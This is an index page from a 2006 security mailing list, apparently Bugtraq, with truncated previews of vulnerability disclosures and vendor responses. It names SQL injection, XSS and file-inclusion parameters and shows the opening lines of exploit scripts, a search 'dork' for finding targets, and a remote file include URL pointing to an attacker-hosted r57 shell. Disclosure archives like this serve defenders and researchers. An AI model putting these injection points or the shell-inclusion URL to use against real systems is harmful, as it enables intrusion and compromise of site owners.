|
Colapse all |
Post message
Cline Communications Sql injection 2006-06-17 liz0 bsdmail com Cline Communications Sql injection ------------------------------------- Site:http://www.celerondude.com/ Demo:http://www.liveelite.com/ --------------------------------- Sql injection 1,photo_enlarged.php file Photo_ID parameter 2,newsdetail.php file NID parameter 3,staff_photo_enlarged. [ more ] [ reply ] Mambo <= 4.6rc1 sql injection 2006-06-17 rgod autistici org #!/usr/bin/php -q -d short_open_tag=on <? echo "Mambo <= 4.6rc1 'Weblinks' blind SQL injection / admin credentials\r\n"; echo "disclosure exploit (benchmark() vesion)\r\n"; echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n"; echo "site: http://retrogod.altervista.org\r\n"; echo "this is called the Sun-Tzu [ more ] [ reply ] bitweaver <= v1.3 multiple vulnerabilities 2006-06-17 rgod autistici org #!/usr/bin/php -q -d short_open_tag=on <? echo "bitweaver <= v1.3 'tmpImagePath' attachment mod_mime exploit\r\n"; echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n"; echo "site: http://retrogod.altervista.org\r\n"; echo "dork: \"powered by bitweaver\"\r\n\r\n"; if ($argc<4) { echo "Usage: php ".$argv[0 [ more ] [ reply ] Re: PHP security (or the lack thereof) 2006-06-16 Steven M. Christey (coley mitre org) Darren Reed said: > From my own mail archives, PHP appears to make up at least 4% of the > email to bugtraq I see - or over 1000 issues since 1995, out of the > 25,000 I have saved. Do you mean the PHP interpreter? Or applications written in PHP? I'm not sure how many vulnerabilities were in [ more ] [ reply ] GreatDomains.com - XSS with cookie disclosure 2006-06-16 admin majorsecurity de GreatDomains.com - XSS with cookie disclosure ---------------------------------------------- Type: Cross site scripting Date: June, 16th 2006 ---------------------------------------------- Credits: ---------------------------------------------- Discovered by: David "Aesthetico" Vieira-Kur [ more ] [ reply ] webcrawler.com - Cross site scripting vulnerability 2006-06-16 admin majorsecurity de webcrawler.com - Cross site scripting vulnerability ---------------------------------------------- Type: Cross site scripting Date: June, 13th 2006 ---------------------------------------------- Credits: ---------------------------------------------- Discovered by: David "Aesthetico" Viei [ more ] [ reply ] Netscape.com - Cross site scripting vulnerability 2006-06-16 admin majorsecurity de Netscape.com - Cross site scripting vulnerability ---------------------------------------------- Type: Cross site scripting Date: June, 13th 2006 ---------------------------------------------- Credits: ---------------------------------------------- Discovered by: David "Aesthetico" Vieira [ more ] [ reply ] file include exploits in dotwidgeta Version 2 2006-06-16 SWEET SWEET (gamr-14 hotmail com) Multiple file include exploits in dotwidgeta Version 2 script type : dotwidgeta Version 2 bug found by : sweet-devil team : site-down type : file include #################################################### exploits : index.php http://www.example.com/path/index.php?file_path=http://yoursite/r57 [ more ] [ reply ] RE: Cisco Secure ACS Cross Site Scripting Vulnerability. 2006-06-17 Paul Oxman (poxman) (poxman cisco com) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello, This is Cisco PSIRT response to the statements made by Thomas Liam Romanis of Fujitsu Services Limited in their posting to BugTraq on the 15th June 2006, regarding Cisco Secure ACS LoginProxy.CGI Cross-Site Scripting Vulnerability, located at ht [ more ] [ reply ] Re: [Bugtraq ID: 17909] ISPConfig Session.INC.PHP Remote File Include Vulnerability 2006-06-16 t brehm ispconfig org The Exploit with Bugtraq ID: 17909 has been researched by the developers of the ISPConfig webhosting controlpanel. The result is that no ISPConfig 2.2.2 installation is vulnerable to this reported exploit. Explanation: 1) The exploit expects a file (session.inc.php) to be in the webroot, but i [ more ] [ reply ] Bingbox.com - XSS & cookie disclosure 2006-06-16 luny youfucktard com (1 replies) [ MDKSA-2006:106 ] - Updated mdkkdm packages fix local vulnerability 2006-06-16 security mandriva com Re: Secunia Research: PicoZip "zipinfo.dll" Multiple Archives BufferOverflow 2006-06-16 c0rrupt f34r us #!/usr/bin/perl # Pico Zip v. 4.01 Long Filename Buffer Overflow # Original advisory - http://www.securityfocus.com/archive/1/437103/30/30/threaded # Author - c0rrupt # Greets - sh0uts to n0limit, muts, and brax for the music ;) # # The vulnerability is caused due to a boundary error within th [ more ] [ reply ] PictureDis Products "lang" Parameter File Inclusion Vulnerability 2006-06-15 root-hacked hotmail com ************************************************************************ ************************** PictureDis Products "lang" Parameter File Inclusion Vulnerability ================================================= Input passed to the "lang" parameter in thumstbl.php, wpfiles.php, and wallpa [ more ] [ reply ] |
|
Privacy Statement |
Homepage:
http://www.hi5.com
Affected files:
Input boxes of editing your profile.
XSS Vuln with cookie disclosure:
It seems hi5.com allows alot of html tags to be used on thier site but they will filter out words like javascript, applet, and iframe tags (which is to be expect
[ more ] [ reply ]